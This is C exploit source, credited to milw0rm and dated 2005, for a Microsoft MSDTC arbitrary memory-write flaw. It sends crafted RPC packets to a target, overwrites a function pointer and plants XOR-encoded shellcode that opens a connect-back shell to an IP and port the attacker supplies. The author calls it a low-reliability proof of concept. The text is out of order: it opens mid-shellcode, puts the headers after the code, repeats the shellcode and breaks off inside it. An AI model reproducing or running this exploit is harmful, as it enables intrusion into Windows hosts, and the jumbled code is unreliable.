"\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
struct ostype
{
DWORD TopSEH;
char description[255];
};
ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL}
};
DWORD BaseImage[]={0x990058, 0x980058};
void MakeShell(char *ip, int port)
{
//make shellcode
unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4);
}
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
exit(-1);
}
if((he = gethostbyname(ip)) == 0)
{
printf("Failed resolving '%s'", ip);
exit(-1);
}
host.sin_port = htons(port);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
exit(-1);
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
exit(-1);
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void WriteFakeLength(DWORD fakelen) //should > 0x22b
{
*(DWORD*)(peer0_1+15*8) = fakelen/2;
}
void BuildShell(char *ip, int port)
{
MakeShell(ip, port);
memcpy(peer0_1 + 132, realsc, sizeof(realsc));
}
void BuildContext(char*ip, int port)
{
SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0);
Disconnect(s);
if(buf[8] != 0x5c)
{
printf("Target not support! Quiting....");
exit(0);
}
Sleep(500);
}
void help(char *n)
{
printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");
printf("----------------------------------------------\n");
printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0;
while(OS[i].TopSEH)
{
printf(" %d %s\n", i, OS[i].description);
i++;
}
}
void main(int argc, char *argv[])
{
if(argc < 5)
{
help(argv[0]);
return;
}
int itype = 0;
int b = 0;
if(argc == 5)
b = atoi(argv[5]);
char *ip = argv[1];
int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
//finish building
printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("(^_^) Function pointer wrote!\n");
//trigger
printf("(*_*) Trigger fault...");
Sleep(500);
s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("Done!\n(*_*) Any shell?");
}
// milw0rm.com [2005-12-01]
/*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you.
OYXin, ...
Code by:
Swan (Swan[at]0x557[dot]org)
*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 };
char peer0_2[300] = {
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd,
(char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 };
#define ip_offset (213+22)
#define port_offset (208+22)
unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
"\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
